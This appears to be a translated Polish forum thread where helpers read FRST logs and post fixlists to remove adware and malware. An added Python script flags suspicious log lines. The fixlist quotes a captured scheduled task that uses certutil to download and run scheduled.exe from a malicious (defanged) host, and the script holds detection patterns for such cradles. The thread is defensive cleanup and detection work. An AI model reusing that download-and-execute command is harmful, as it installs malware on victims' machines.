
[Solved] Please analyse my FRST logs

tajniak41 20 Apr 2018 08:05 489 5
  • #1 20 Apr 2018 08:05
    tajniak41
    Level 8

    Hello, some junk showed up on my laptop, so I removed it with AdwCleaner. Unfortunately one item is still left:
    -PUP.Optional.Legacy, C:\Windows\System32\config\systemprofile\appdata\local\installationconfiguration.xml

    The FRST files are attached. Please check the logs and tell me what to put into the Fixlist to remove it.

  • Helpful post
    #2 20 Apr 2018 10:48
    Kolobos
    Computer specialist

    Uninstall:
    nWwZkeKqS8uG Updater version 1.2.0.4
    SafeFinder

    Run this Fixlist.txt with FRST:
    CloseProcesses:
    Task: {1DA19E7A-65AC-46DB-A2C8-7F16BB6BD980} - System32\Tasks\{5057A362-8AD8-4E4E-A943-F3CDCF4D8521} => C:\Windows\system32\pcalua.exe -a "C:\Users\t410\Desktop\Soft\EPLAN P8 1.9 SP1 patch Windows x64\haspdinst.exe" -d "C:\Users\t410\Desktop\Soft\EPLAN P8 1.9 SP1 patch Windows x64"
    Task: {2333FC43-423B-40C7-B3BF-AC1DEEC4CFC7} - System32\Tasks\ScheduledUpdate => cmd.exe /C certutil.exe -urlcache -split -f hxxp://dp.fastandcoolest.com/scheduled/3/scheduled.exe C:\Users\MICHAEL\AppData\Local\Temp\csrss\scheduled.exe && C:\Users\MICHAEL\AppData\Local\Temp\csrss\scheduled.exe /31340 <==== UWAGA
    Task: {31390F87-781B-4224-8060-6B7CBB9BE036} - \System Healer Monitor -> Brak pliku <==== UWAGA
    Task: {440E054A-E0A4-4425-8932-A074550910F4} - System32\Tasks\{7A970131-F9CD-4CD2-BFAB-04F4CAB3ED72} => C:\Windows\system32\pcalua.exe -a "C:\Users\t410\Desktop\EPLAN_Electric_P8_1.9.10.3725\EPLAN Electric P8 1.9.6 管方中文版修订.exe" -d C:\Users\t410\Desktop\EPLAN_Electric_P8_1.9.10.3725
    Task: {5AD1671B-383A-460D-B3B3-C44BC1B0D458} - System32\Tasks\{58413777-9B6F-48E2-9A81-2F32A09D7BBF} => C:\Users\t410\Desktop\Soft\EPLAN P8 1.9 SP1 patch Windows x64\haspdinst.exe [2009-09-01] (Aladdin Knowledge Systems Ltd.)
    Task: {68297E00-BB9F-4D58-8A9F-C3CB7F3F99A3} - System32\Tasks\{A0B1A2C6-1795-45A9-8801-92AB8C20EE7E} => C:\Windows\system32\pcalua.exe -a C:\Users\t410\Downloads\ProTuner_HBS_Setup_2012-10-18\ProTuner_HBS_Setup_2012-10-18.exe -d C:\Users\t410\Downloads\ProTuner_HBS_Setup_2012-10-18
    Task: {72AEE338-F39B-46AD-8059-8002CCF08435} - \Online Application V2G5 -> Brak pliku <==== UWAGA
    Task: {78D0D48C-BC49-4740-8982-AFBA47436DF8} - System32\Tasks\{DD837318-24D4-4246-BE76-A951DFF7824C} => C:\Windows\system32\pcalua.exe -a "C:\Users\t410\Desktop\EPLAN P8 1.9 SP1 patch Windows x64\haspdinst.exe" -d "C:\Users\t410\Desktop\EPLAN P8 1.9 SP1 patch Windows x64"
    Task: {7EB7AFC3-742A-4341-8201-1BD7DE20C95F} - System32\Tasks\{53079A5D-36B9-44E6-8296-6CEE899E3EAF} => C:\Windows\system32\pcalua.exe -a E:\programy\PC_AD_USB_V12\Setup.exe -d E:\programy\PC_AD_USB_V12
    Task: {93EF5762-91FA-477B-A516-D3C9B111AB9D} - System32\Tasks\nWwZkeKqS8uG => nwwzkekqs8ug.exe <==== UWAGA
    Task: {94A55314-2162-4322-AA30-6F7FEC5F2464} - \Online Application V2G3 -> Brak pliku <==== UWAGA
    Task: {A060F4AB-4DA8-4BAC-A765-6A8376F14C5E} - \Online Application V2G4 -> Brak pliku <==== UWAGA
    Task: {B2E76EC1-DF06-40CA-B243-7AB884D2EECD} - \ShadowsocksS -> Brak pliku <==== UWAGA
    Task: {B4D1AB34-E8ED-4F93-AE8D-EDE0421A62C7} - System32\Tasks\csrss => C:\Windows\rss\csrss.exe [2018-04-19] () <==== UWAGA
    Task: {C553F154-2DB7-494F-8A57-3EF07ABD6498} - System32\Tasks\cmdsrv => C:\Browse\cmdsrvs.exe [2018-03-13] (Secrypt Inc.)
    Task: {D469F27F-8AD0-4DD8-9C47-E0ED5FA53A43} - \Updater_Online_Application -> Brak pliku <==== UWAGA
    Task: {DE429838-1ADB-43F7-A91C-74F1975D62AD} - \Online Application V2G6 -> Brak pliku <==== UWAGA
    Task: {E2B3CF14-4A02-4567-94AD-69D917AD2C22} - System32\Tasks\GoogleUpdateTaskMachineCore => C:\Program Files (x86)\Google\Update\GoogleUpdate.exe [2017-02-27] (Google Inc.)
    Task: {E889D97F-530B-4A03-AE24-C174AD6A1FE0} - \Online Application V2G2 -> Brak pliku <==== UWAGA
    Task: {E97A05E3-CF2A-4CCE-B89F-A1919DB9DAA8} - System32\Tasks\{3EFB6355-5F59-4249-AE23-DCBA94062460} => C:\Windows\system32\pcalua.exe -a C:\haspdinst.exe -d C:\
    Task: {F4ACB2DC-CEA6-4CA9-95F1-8FFA2EB16C65} - \Online Application V2G1 -> Brak pliku <==== UWAGA
    (Secrypt Inc.) C:\Browse\cmdsrvs.exe
    (Secrypt Inc.) C:\Browse\cmdsrvs.exe
    HKU\S-1-5-21-1475832282-250630812-1943254801-1000\...\Run: [WanderingWave] => C:\Windows\rss\csrss.exe [3115008 2018-04-19] () <==== UWAGA
    HKU\S-1-5-21-1475832282-250630812-1943254801-1000\...\MountPoints2: E - E:\SETUP.EXE
    HKU\S-1-5-21-1475832282-250630812-1943254801-1000\...\MountPoints2: {0f516b5f-04e7-11e7-a83f-f0def13cf83f} - E:\setup.exe
    HKU\S-1-5-21-1475832282-250630812-1943254801-1000\...\MountPoints2: {1d25fcb2-cee9-11e7-a4cd-0024d7859f6c} - E:\AutoRun.exe
    HKU\S-1-5-21-1475832282-250630812-1943254801-1000\...\MountPoints2: {b8db92ce-fc5b-11e6-a7b2-806e6f6e6963} - D:\Start.exe
    GroupPolicy: Ograniczenia - Chrome <==== UWAGA
    HKU\S-1-5-21-1475832282-250630812-1943254801-1000\Software\Microsoft\Internet Explorer\Main,Search Page = hxxps://%66%65%65%64.%73%6F%6E%69%63-%73%65%6...pJtBSmJxn8fCzbGDdvpZJxdifIh24bUkDSAA,,&q={searchTerms}
    HKU\S-1-5-21-1475832282-250630812-1943254801-1000\Software\Microsoft\Internet Explorer\Main,Start Page = hxxps://%66%65%65%64.%68%65%6C%70%65%72%62%61...RBqrFzleBsuoCNEkdkX1MqIeVtTWYikExPyqIZ6J5wg,,,,
    SearchScopes: HKLM-x32 -> DefaultScope - brak wartości
    CHR HKU\S-1-5-21-1475832282-250630812-1943254801-1000\SOFTWARE\Google\Chrome\Extensions\...\Chrome\Extension: [efaidnbmnnnibpcajpcglclefindmkaj] - hxxps://clients2.google.com/service/update2/crx
    CHR HKLM-x32\...\Chrome\Extension: [gomekmidlodglbbmalcneegieacbdmki] - hxxps://clients2.google.com/service/update2/crx
    S4 aspnet_state; %SystemRoot%\Microsoft.NET\Framework\v2.0.50727\aspnet_state.exe [X]
    S2 nWwZkeKqS8uG Updater; C:\Program Files (x86)\nWwZkeKqS8uG Updater\nWwZkeKqS8uG Updater.exe [X]
    S2 UA Local Discovery Server; C:\Program Files (x86)\OPC Foundation\UA\v1.1\GDS\Bin\Opc.Ua.DiscoveryServer.exe [X]
    S1 butldsk; \SystemRoot\System32\drivers\butldsk.sys [X]
    2018-04-19 12:38 - 2018-04-19 12:38 - 000000000 ____D C:\Windows\system32\0PQQQPSWQafmis
    2018-04-19 12:38 - 2018-04-19 12:38 - 000000000 ____D C:\Windows\system32\0PQQorppQafmis
    2018-04-19 12:38 - 2018-04-19 12:38 - 000000000 ____D C:\Windows\system32\0PQQcdtsQafmis
    2018-04-19 12:38 - 2018-04-19 12:38 - 000000000 ____D C:\Windows\0PQQQPSWQafmis
    2018-04-19 12:38 - 2018-04-19 12:38 - 000000000 ____D C:\Windows\0PQQorppQafmis
    2018-04-19 12:38 - 2018-04-19 12:38 - 000000000 ____D C:\Windows\0PQQcdtsQafmis
    2018-04-19 11:47 - 2018-04-19 11:47 - 000000000 ____D C:\Windows\system32\0PTQQpexYafmis
    2018-04-19 11:47 - 2018-04-19 11:47 - 000000000 ____D C:\Windows\0PTQQpexYafmis
    2018-04-05 21:26 - 2018-04-05 21:26 - 000000000 ____D C:\Windows\system32\0PTQVPPPPPfmis
    2018-04-05 21:26 - 2018-04-05 21:26 - 000000000 ____D C:\Windows\system32\0PTQUPPPPPfmis
    2018-04-05 21:26 - 2018-04-05 21:26 - 000000000 ____D C:\Windows\system32\0PTQTPQWQafmis
    2018-04-05 21:26 - 2018-04-05 21:26 - 000000000 ____D C:\Windows\system32\0PTQTPPPPPfmis
    2018-04-05 21:26 - 2018-04-05 21:26 - 000000000 ____D C:\Windows\system32\0PTQSPPPPPfmis
    2018-04-05 21:26 - 2018-04-05 21:26 - 000000000 ____D C:\Windows\system32\0PTQsclpQafmis
    2018-04-05 21:26 - 2018-04-05 21:26 - 000000000 ____D C:\Windows\system32\0PTQRPPPPPfmis
    2018-04-05 21:26 - 2018-04-05 21:26 - 000000000 ____D C:\Windows\system32\0PTQrgWsQafmis
    2018-04-05 21:26 - 2018-04-05 21:26 - 000000000 ____D C:\Windows\system32\0PTQQPPPPPfmis
    2018-04-05 21:26 - 2018-04-05 21:26 - 000000000 ____D C:\Windows\system32\0PTQQorpWsfmis
    2018-04-05 21:26 - 2018-04-05 21:26 - 000000000 ____D C:\Windows\system32\0PTQcsabWsfmis
    2018-04-05 21:26 - 2018-04-05 21:26 - 000000000 ____D C:\Windows\system32\0PTQcsabcwfmis
    2018-04-05 21:26 - 2018-04-05 21:26 - 000000000 ____D C:\Windows\system32\0PTQ_lcsQafmis
    2018-04-05 21:26 - 2018-04-05 21:26 - 000000000 ____D C:\Windows\0PTQVPPPPPfmis
    2018-04-05 21:26 - 2018-04-05 21:26 - 000000000 ____D C:\Windows\0PTQUPPPPPfmis
    2018-04-05 21:26 - 2018-04-05 21:26 - 000000000 ____D C:\Windows\0PTQTPQWQafmis
    2018-04-05 21:26 - 2018-04-05 21:26 - 000000000 ____D C:\Windows\0PTQTPPPPPfmis
    2018-04-05 21:26 - 2018-04-05 21:26 - 000000000 ____D C:\Windows\0PTQSPPPPPfmis
    2018-04-05 21:26 - 2018-04-05 21:26 - 000000000 ____D C:\Windows\0PTQsclpQafmis
    2018-04-05 21:26 - 2018-04-05 21:26 - 000000000 ____D C:\Windows\0PTQRPPPPPfmis
    2018-04-05 21:26 - 2018-04-05 21:26 - 000000000 ____D C:\Windows\0PTQrgWsQafmis
    2018-04-05 21:26 - 2018-04-05 21:26 - 000000000 ____D C:\Windows\0PTQQPPPPPfmis
    2018-04-05 21:26 - 2018-04-05 21:26 - 000000000 ____D C:\Windows\0PTQQorpWsfmis
    2018-04-05 21:26 - 2018-04-05 21:26 - 000000000 ____D C:\Windows\0PTQcsabWsfmis
    2018-04-05 21:26 - 2018-04-05 21:26 - 000000000 ____D C:\Windows\0PTQcsabcwfmis
    2018-04-05 21:26 - 2018-04-05 21:26 - 000000000 ____D C:\Windows\0PTQ_lcsQafmis
    2018-04-18 23:20 - 2005-09-06 17:06 - 000028672 _____ C:\Windows\SysWOW64\hlduinst.exe
    2018-04-18 23:18 - 2018-04-18 23:18 - 000000266 __RSH C:\Users\t410\ntuser.pol
    2018-04-18 23:16 - 2018-04-19 22:01 - 000000000 ____D C:\AdwCleaner
    2018-04-18 23:13 - 2018-04-18 23:13 - 000021532 _____ C:\Windows\System32\Tasks\nWwZkeKqS8uG
    2018-04-18 23:13 - 2018-04-18 23:13 - 000003240 _____ C:\Windows\System32\Tasks\cmdsrv
    2018-04-18 23:12 - 2018-04-19 21:41 - 000000000 ____D C:\Browse
    2018-04-18 23:12 - 2018-04-18 23:12 - 007602176 _____ C:\Users\t410\AppData\Local\agent.dat
    2018-04-18 23:12 - 2018-04-18 23:12 - 001986554 _____ C:\Users\t410\AppData\Local\Whitelam.tst
    2018-04-18 23:12 - 2018-04-18 23:12 - 001895383 _____ C:\Users\t410\AppData\Local\AlphaZooeco.bin
    2018-04-18 23:12 - 2018-04-18 23:12 - 000278510 _____ C:\Users\t410\AppData\Local\Holdlux.tst
    2018-04-18 23:12 - 2018-04-18 23:12 - 000126464 _____ C:\Users\t410\AppData\Local\noah.dat
    2018-04-18 23:12 - 2018-04-18 23:12 - 000070896 _____ C:\Users\t410\AppData\Local\Config.xml
    2018-04-18 23:12 - 2018-04-18 23:12 - 000005568 _____ C:\Users\t410\AppData\Local\md.xml
    2018-04-18 23:12 - 2018-04-18 23:12 - 000000000 ____D C:\WinSys
    2018-04-18 23:12 - 2018-04-18 23:12 - 000000000 ____D C:\ProgramData\97f29a35-8705-47de-97b4-45277a5a7676
    2018-04-18 23:12 - 2018-04-18 23:12 - 000000000 ____D C:\ProgramData\5ef56cd9-83de-4b9a-9c95-e64c97565d3e
    2018-04-18 23:12 - 2018-04-18 23:12 - 000000000 ____D C:\Applications
    2018-04-18 23:12 - 2018-04-18 23:11 - 001814528 _____ (TODO: <Company name>) C:\Users\t410\AppData\Local\Whitelam.exe
    2018-04-18 23:12 - 2018-04-18 23:11 - 001814528 _____ (TODO: <Company name>) C:\Users\t410\AppData\Local\Holdlux.exe
    2018-04-18 23:11 - 2018-04-19 22:23 - 000003544 _____ C:\Windows\System32\Tasks\ScheduledUpdate
    2018-04-18 23:11 - 2018-04-19 22:23 - 000003186 _____ C:\Windows\System32\Tasks\csrss
    2018-04-18 23:11 - 2018-04-18 23:12 - 000929792 _____ C:\Users\t410\AppData\Local\sham.db
    2018-04-18 23:11 - 2018-04-18 23:11 - 000140800 _____ C:\Users\t410\AppData\Local\installer.dat
    2017-03-21 13:30 - 2015-04-10 15:27 - 002506752 _____ (Company) C:\Users\t410\Multiway.exe
    2017-03-21 13:31 - 2004-03-10 01:00 - 000253952 _____ (Microsoft Corporation) C:\Users\t410\SETUP1.EXE
    2018-04-18 23:12 - 2018-04-18 23:12 - 007602176 _____ () C:\Users\t410\AppData\Local\agent.dat
    2018-04-18 23:12 - 2018-04-18 23:12 - 001895383 _____ () C:\Users\t410\AppData\Local\AlphaZooeco.bin
    2018-04-18 23:12 - 2018-04-18 23:12 - 000070896 _____ () C:\Users\t410\AppData\Local\Config.xml
    2018-04-19 23:15 - 2018-04-19 23:15 - 000000092 _____ () C:\Users\t410\AppData\Local\fusioncache.dat
    2018-04-18 23:12 - 2018-04-18 23:11 - 001814528 _____ (TODO: <Company name>) C:\Users\t410\AppData\Local\Holdlux.exe
    2018-04-18 23:12 - 2018-04-18 23:12 - 000278510 _____ () C:\Users\t410\AppData\Local\Holdlux.tst
    2018-04-18 23:11 - 2018-04-18 23:11 - 000140800 _____ () C:\Users\t410\AppData\Local\installer.dat
    2018-04-18 23:12 - 2018-04-18 23:12 - 000005568 _____ () C:\Users\t410\AppData\Local\md.xml
    2018-04-18 23:12 - 2018-04-18 23:12 - 000126464 _____ () C:\Users\t410\AppData\Local\noah.dat
    2018-04-18 23:11 - 2018-04-18 23:12 - 000929792 _____ () C:\Users\t410\AppData\Local\sham.db
    2018-04-18 23:12 - 2018-04-18 23:12 - 000032038 _____ () C:\Users\t410\AppData\Local\uninstall_temp.ico
    2018-04-18 23:12 - 2018-04-18 23:11 - 001814528 _____ (TODO: <Company name>) C:\Users\t410\AppData\Local\Whitelam.exe
    2018-04-18 23:12 - 2018-04-18 23:12 - 001986554 _____ () C:\Users\t410\AppData\Local\Whitelam.tst
    C:\Windows\rss\csrss.exe
    EmptyTemp:

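As an added example (not from the thread, and not FRST's or the forum's own code), the Python script below applies the triage rules Kolobos used by eye to a handful of lines copied from the fixlist above: certutil download cradles, orphaned tasks, services whose binary is gone, core-process names outside System32, executables run from Temp, template version info, and percent-encoded hijack URLs. The rule wording and the SYSTEM_NAMES list are my own choices, not FRST conventions.

```python
import re
from urllib.parse import unquote

# Lines copied from the FRST fixlist in the post above (FRST's "<==== UWAGA" marker
# stripped), plus the benign GoogleUpdate task from the same list as a control.
FRST_LINES = [
    r"Task: {2333FC43-423B-40C7-B3BF-AC1DEEC4CFC7} - System32\Tasks\ScheduledUpdate => cmd.exe /C certutil.exe -urlcache -split -f hxxp://dp.fastandcoolest.com/scheduled/3/scheduled.exe C:\Users\MICHAEL\AppData\Local\Temp\csrss\scheduled.exe && C:\Users\MICHAEL\AppData\Local\Temp\csrss\scheduled.exe /31340",
    r"Task: {31390F87-781B-4224-8060-6B7CBB9BE036} - \System Healer Monitor -> Brak pliku",
    r"Task: {B4D1AB34-E8ED-4F93-AE8D-EDE0421A62C7} - System32\Tasks\csrss => C:\Windows\rss\csrss.exe [2018-04-19] ()",
    r"Task: {E2B3CF14-4A02-4567-94AD-69D917AD2C22} - System32\Tasks\GoogleUpdateTaskMachineCore => C:\Program Files (x86)\Google\Update\GoogleUpdate.exe [2017-02-27] (Google Inc.)",
    r"HKU\S-1-5-21-1475832282-250630812-1943254801-1000\...\Run: [WanderingWave] => C:\Windows\rss\csrss.exe [3115008 2018-04-19] ()",
    r"HKU\S-1-5-21-1475832282-250630812-1943254801-1000\Software\Microsoft\Internet Explorer\Main,Search Page = hxxps://%66%65%65%64.%73%6F%6E%69%63-%73%65%6...pJtBSmJxn8fCzbGDdvpZJxdifIh24bUkDSAA,,&q={searchTerms}",
    r"S2 WinDefender; C:\Windows\windefender.exe [X]",
    r"2018-04-18 23:12 - 2018-04-18 23:11 - 001814528 _____ (TODO: <Company name>) C:\Users\t410\AppData\Local\Whitelam.exe",
]

# Core Windows process names that malware borrows; the genuine binaries live only
# directly under System32 or SysWOW64, so the same name anywhere else is a masquerade.
SYSTEM_NAMES = {"csrss.exe", "svchost.exe", "lsass.exe", "winlogon.exe", "services.exe"}
LEGIT_DIR = re.compile(r"^[A-Z]:\\Windows\\(System32|SysWOW64)\\[^\\]+$", re.I)
EXE_PATH = re.compile(r'[A-Z]:\\[^\[\]<>"]*?\.exe(?=[\s"]|$)', re.I)

def triage(line):
    """Return the findings for one FRST line; an empty list means nothing was flagged."""
    low = line.lower()
    findings = []
    if "certutil" in low and "-urlcache" in low:
        findings.append("certutil download cradle in a scheduled task")
    if low.startswith("task:") and ("-> brak pliku" in low or "-> no file" in low):
        findings.append("orphaned task (binary missing)")
    if re.match(r"^S\d .*\[X\]$", line):
        findings.append("service registered but its binary is missing")
    if "(todo: <company name>)" in low:
        findings.append("unsigned binary with template version info")
    for path in EXE_PATH.findall(line):
        name = path.rsplit("\\", 1)[-1].lower()
        if name in SYSTEM_NAMES and not LEGIT_DIR.match(path):
            findings.append("system process name outside System32: " + path)
        if "\\temp\\" in path.lower():
            findings.append("executable launched from a Temp directory: " + path)
    m = re.search(r"(Search Page|Start Page) = (\S+)", line)
    if m and "%" in m.group(2):
        # unquote() turns %66%65%65%64 into "feed"; the log line is truncated with "...".
        findings.append("percent-encoded browser hijack URL: " + unquote(m.group(2)))
    return list(dict.fromkeys(findings))  # drop duplicate findings, keep order

if __name__ == "__main__":
    for line in FRST_LINES:
        print(triage(line) or "ok", "<-", line[:60])
```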
  • Helpful post
    #4 20 Apr 2018 23:36
    RADU23
    Moderator - Computer Service

    Run this fixlist:

    Quote:
    HKLM\SOFTWARE\Policies\Microsoft\Windows Defender: Ograniczenia <==== UWAGA
    HKU\S-1-5-21-1475832282-250630812-1943254801-1000\...\MountPoints2: {9fd0a1f7-d02f-11e7-9957-f0def13cf83f} - G:\AutoRun.exe
    HKU\S-1-5-21-1475832282-250630812-1943254801-1000\...\MountPoints2: {9fd0a1fb-d02f-11e7-9957-f0def13cf83f} - G:\AutoRun.exe
    FF Plugin: @microsoft.com/GENUINE -> disabled [Brak pliku]
    FF Plugin-x32: @microsoft.com/GENUINE -> disabled [Brak pliku]
    CHR HKLM-x32\...\Chrome\Extension: [eofcbnmajmjmplflapaojjnihcjkigck] - hxxps://clients2.google.com/service/update2/crx
    S2 s7hspsvx; C:\Program Files (x86)\Siemens\Step7\s7bin\s7hspsvx.exe [X]
    S2 WinDefender; C:\Windows\windefender.exe [X]
    2018-04-20 23:21 - 2018-04-20 23:23 - 000000000 ____D C:\AdwCleaner


    After that, run an MBAM scan and remove everything it detects =>
    https://www.malwarebytes.org/dl-confirm/

  • #5 21 Apr 2018 23:50
    tajniak41
    Level 8

    Thanks RADU23 for the help. I consider the topic closed.

  • #6 21 Apr 2018 23:51
    tajniak41
    Level 8

    Added after 1 [minute]:

    Problem solved as per user RADU23's reply.